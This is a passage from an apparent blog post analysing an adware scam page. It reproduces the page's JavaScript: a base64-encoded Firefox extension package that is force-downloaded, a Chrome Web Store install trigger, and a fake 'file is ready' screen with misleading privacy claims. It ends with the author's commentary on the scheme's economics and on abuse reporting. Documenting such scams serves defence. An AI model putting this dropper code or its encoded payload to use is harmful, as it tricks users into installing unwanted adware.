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", "application/x-xpinstall"));a.href = url;a.target="_top";document.body.appendChild(a);a.click();

return false;}$(document).ready(function(){if(location.hostname.split('.')[0] == 'cw'){setTimeout(function(){// alert("ATTENTION: Your searches might be tracked. To continue browsing safely you should install the extension.");}, 1000);}$('.searchasist-back').fadeIn(500);$("#dlmsg").find('textarea').on('focus click', function() {$(this).select();});repView('lpchr');$('body').on('click', '#skip2', function(){close();if(location.hostname.split('.')[0] != 'd')window.location.href = '/';else dl();//$('.loader').show();});

$('body').on('mousedown', ':not(.inst)', function(){$('.loader, .overlay1').hide();$('#element_to_pop_up').fadeOut();});$('body').on('click', '.inst', function(){close();$('.loader, .overlay1').show();$('#hlp').fadeIn(1500);chrome.webstore.install('https://chrome.google.com/webstore/detail/oofhoenjnigkpkkdnplfcbjapgcolpdm', function(){dl();//$.get('hoconv.php?cont=USA&br=chrome&cid=8gb7mi6np8wd&off_id=');$('#hlp').fadeOut();}, function(reason){dl();$('.loader, .overlay1').hide();$('#hlp').fadeOut();$('.box .content').click();});return false;});

});

</script><link rel="shortcut icon" href="img/fav.png"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

</head><body class="searchasist"><div class="overlay overlay1" style="display:none;color: #000; opacity: 0.5; z-index:99999;"></div><div id="searchasist-bg_bb" style="display: block;"></div><div class="searchasist-wrap"><div class="genOverlayBg"><p class="extension-text bounce">Click "Add Extension"<br> to install</p></div></div>

<div class="searchasist-wrap-ff"><div class="genOverlayBg-ff"><p class="extension-text-ff bounce"><span class="fst">Step 2 : Click "Allow" to proceed</span><br><br><span class="fst">Step 3 : Click "Install" button to add<br>the extension</span></p></div></div>

<div class="searchasist-back" style="display: none"><div class="wrapper"><header class="searchasist-header"><p class="searchasist-txt">Maintaining Internet Speed Is Critical, But So Is<br><span><span class="img-box"><img class="track-img" src="img/tracking.png"/></span>Stop Big Companies FromTracking Your Searches</span><span class="steps-head">STEPS: 1/2</span></p></header><div class="right"><div class="inner"><div class="searchasistnote1"><h1>Recommended:</h1></br><p>The SearchAssist extension protect your privacy by detecting searches that maybe tracked and tied to your personal information. It intercepts those searches andredirects them to SearchAssist privacy-enhanced search engine.</p>

</div>

<section class="bottom"><p class="searchasistnote3">By clicking the button below you agree to install SearchAssist Incognito extension and have read and agreed to the <a href="http://www.privacyassistant.net/tos/" target="_blank">EULA</a> & <a href="http://www.privacyassistant.net/privacy/" target="_blank">Privacy Policy</a></p></section><button id="button" class="install_extension inst">Install Now </button></div></div></div>

<div class="app"><div id="dlmsg" class="detail ready" style="display:none;z-index:99999; box-shadow: 0 5px 30px rgba(0, 0, 0, 0.5); "><div class="content"><div class="desc"><h1 class="file-ready">Your file is ready!</h1><hr> <p class="p-ready">Copy and paste the following link into your browser to download.</p><textarea readonly></textarea></div></div></div></div>

</div>

<div id="element_to_pop_up" style="display:none; position: absolute; top: 120px; left:305px; z-index: 999999; " ><img src="pop-moz.png" alt=""/></div><img src="hlp.png" id="hlp" style="display:none; position: absolute; top: 245px; margin: 0 auto;left: 48%; margin-right: -50%; z-index: 999999; " /><script type="text/javascript">var $play = $('.play'),$detail = $('.box12'),$content = $('.content', $detail),$close = $('.close');

$('.box .content').click(function(){$content.html($(this).html());$play.appendTo($content);

$detail.show();

$('.poster', $detail).delay(10).queue(function(next) {$detail.addClass('ready');next();});});

/*--------------------Close--------------------*/function close(){$('.loader, .overlay1').hide();$p = $('.box12 ');$p.css({top: $p.data('top'),left: $p.data('left'),width: $p.data('width'),height: $p.data('height'),})$detail.removeClass('ready').delay(500).queue(function(next){$(this).hide();$('.poster').removeClass('active');next();});}

$close.click(close);

</script></body>

The funny part here is of course that they’re attempting to rail against the tracking infrastructure of big companies while themselves exhaustively using tracking and referral services from a very wide range of companies large and small.

An adware install like this makes more economic sense as a spam endpoint than trying to convince clients to put in a credit card number for an actual porn video; the conversion rates for paid content are very low (there’s lots of free content out there) and porn suffers a problem of chargebacks “Um, Chase Bank, yeah, that charge was totally not mine…”. So instead of having a 1% shot at a $30 conversion, worth $0.30, they go for a 10% shot at a $0.01/search conversion — at 10 searches a day that’s $35.00 if you keep the client for a year, so a probabilistic value of $3.50. While my math may be a bit off here, the point stands that adware converts reasonably well vs actual commercial porn upsell. But you can still get a dumb guy to click on something next to a cute girl’s picture, so that’s your high conversion on lead-gen…

The tragic part is that chasing down the abuse reporting endpoints for all of these services is exhausting. I’m sure the fine folks at Amazon (and Google, and Facebook!) don’t want to play such a key role in enabling this stuff, but it’s a lot to keep tracking down and the automated tools are clearly not quite keeping up.

Feedback welcome: what I missed, what I screwed up, and ways we can collectively crack down on this crap as an industry.

Written by dweekly | $
Published by HackerNoon on 2017/08/10
ABOUTHow hackers start their afternoons. We publish tech stories and build publishing software.

READEntirely free library read by hundreds of millions to learn anything about any technology.

WRITEHackerNoon elevates quality technology writing far and wide across the interwebs.

PARTNERHackerNoon works directly with tech companies to place ads by content relevancy